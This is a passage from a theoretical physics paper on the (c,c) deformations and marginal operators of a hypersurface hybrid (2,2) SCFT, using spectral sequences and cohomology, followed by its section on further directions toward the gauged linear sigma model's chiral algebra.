L)&\frac{H^{1}(V,T_{V}^{*})}{\Psi^{2}\sim\Psi^{2}+ \Psi^{5}P}\\ \hline\end{array}\] The bottom right corner is isomorphic to the toric deformations, while the top left gives the non-toric deformations as \(H^{2}(V,T_{V}^{*}\otimes L)\), matching our result in section 3.3. ### (c,c) Deformations This analysis is easily extended to the (c,c) deformations. We now search for all operators with \(\mathrm{U}(1)_{\mathrm{ L}}\times\mathrm{U}(1)_{\mathrm{ R}}\) charges \((1,1)\) and weight \(h=\frac{1}{2}\). The full list and their \(\phi\) grading are given below. \[\begin{array}{llll}\mathcal{O}^{1,0}=\Psi^{1,0},&\mathcal{L}_{v}\Psi^{1,0}= \Psi^{1,0},&\Psi^{1,0}\in\mathcal{A}_{Y}^{0,u}\\ \mathcal{O}^{1,1}=\Psi^{1,1\alpha}\overline{\chi}_{\alpha},&\mathcal{L}_{v} \Psi^{1,1}=0,&\Psi^{1,1}\in\mathcal{A}^{0,u}(T_{Y})\\ \mathcal{O}^{1,2}=\Psi^{1,2\alpha\beta}\overline{\chi}_{\alpha}\overline{\chi }_{\beta},&\mathcal{L}_{v}\Psi^{1,2}=-\Psi^{1,2},&\Psi^{1,2}\in\mathcal{A}_{Y }^{0,u}(\wedge^{2}T_{Y})\\ \end{array} \tag{5.9}\] The first stage of the spectral sequence gives the complex where again we are interested in the cohomology along the dashed line at \(q_{{}_{\rm R}}=1\). Applying the same isomorphisms to this complex and utilizing Serre duality gives \[\begin{CD}H^{1}(V,T_{V})@>{\overline{\mathbf{Q}}_{W}}>{}>0\\ H^{0}(V,T_{V})\oplus H^{0}(V,\mathcal{O}_{V})@>{\overline{\mathbf{Q}}_{W}}>{}>H^{0}(V,L^{ *})\end{CD}\] The \(\overline{\mathbf{Q}}_{W}\) map acts as before, and on the bottom row quotients out elements of \(H^{0}(V,L^{*})\) proportional to \(\partial\mathcal{W}\). The \(d_{2}\) map would take every entry into an empty group, so the spectral sequence already converges at this stage, and the cohomology is given by \[\begin{CD}H^{1}(V,T_{V})@>{0}>{}>\\ H^{0}(V,T_{V})@>{H^{0}(V,L^{*})}>{}>\overline{\Psi^{1,0}\sim\Psi^{1,0}+dW. \Psi^{1,1}}>\end{CD}\] The bottom right gives the polynomial deformations, while the non-polynomial deformations are given in the top left by \(H^{1}(V,T_{V})\), as expected. Further directions In this paper we investigated a UV Lagrangian theory -- the hypersurface hybrid, which is expected to a compact (2,2) SCFT. We established two main results. First, we obtained explicit representatives for all marginal operators of the SCFT in terms of cohomology classes in the chiral algebra \({\cal H}_{\overline{\cal D}}\). Second, we demonstrated that although the hypersurface hybrid is a rather degenerate example of a hybrid theory, nevertheless the hybrid methodology can be used to study its NS-R sector. While our results certainly settle some questions of principle, they also bear on practical matters. First, our construction of representatives of the non-toric and non-polynomial marginal operators could be used to evaluate correlation functions of all marginal operators in the theory, and perhaps they could already play a role in the mathematical formulations of topological field theories as in [19, 21, 47]. This will require an analysis of quantum corrections to our results, which are probably best analyzed in the language of the curved \(bc\)-\(\beta\gamma\) system that encodes the chiral algebra of the hybrid theory [22]. It seems reasonable to conjecture that the quantum corrections to the form of the operators we gave can be absorbed into a redefinition of the Kahler potential \({\cal K}\), which made its appearance in the construction through the superfield \(\Theta\). Of course there would be non-perturbative corrections to OPE of the (a,c) operators, and it would be extremely interesting to understand these directly in terms of the hybrid theory. The results obtained recently in [23] should be of use in uncovering these quantum corrections. More importantly, the work is a step towards a more ambitious UV lift of the infinitesimal deformations to the gauged linear sigma model. Our construction of the operators was given in a particular large radius phase of the GLSM, and it relied on a number of geometric properties of this phase. It would be interesting to study the chiral algebra of the GLSM in detail in order to find the non-toric and non-polynomial deformations in that UV description. We hope that our explicit representatives might serve as a guide to finding that structure, which by its nature will be more combinatoric rather than geometric and will require some further developments of the gauged linear sigma model's chiral algebra. Whatever the motivation for those explorations, a systematic understanding of the latter will be of great use to future generations of linear sigma model experts.